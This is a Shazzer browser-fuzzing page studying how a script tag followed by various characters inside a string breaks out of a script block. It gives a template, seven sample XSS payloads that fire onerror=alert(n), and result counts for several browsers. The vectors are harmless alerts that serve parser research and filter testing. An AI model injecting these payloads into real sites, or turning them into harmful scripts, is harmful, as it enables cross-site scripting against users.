Fuzzing weird script behaviour after script text
7
7
7This demonstrates that Shazzer now allows you to fuzz script tags.
Created byhackvertor
Created Jul 18, 2024
Updated May 27, 2025
Detecting browser...
CategoryHTML Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
Template used:
<script>0x0D
x = "<!--<script$[chr]>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=log($[i])>"></div>Sample payloads
<script>0x0D
x = "<!--<script0x09>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(9)>"></div><script>0x0D
x = "<!--<script
>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(10)>"></div><script>0x0D
x = "<!--<script0x0C>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(12)>"></div><script>0x0D
x = "<!--<script0x0D>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(13)>"></div><script>0x0D
x = "<!--<script >"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(32)>"></div><script>0x0D
x = "<!--<script/>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(47)>"></div><script>0x0D
x = "<!--<script>>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(62)>"></div>Fuzz results
Chrome 144.0.0.0 desktop Windows NT 10.0
Updated
Sun Jan 25 2026
Found 7 results
Loading...
Chrome 141.0.0.0 desktop macOS 10.15.7older version
Updated
Mon Oct 27 2025
Found 7 results
Loading...
Firefox 147.0 desktop Linux
Updated
Sun Feb 01 2026
Found 7 results
Loading...
Firefox 128.0 desktop macOS 10.15older version
Updated
Thu Jul 18 2024
Found 7 results
Loading...
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated
Sat Jan 31 2026
Found 7 results
Loading...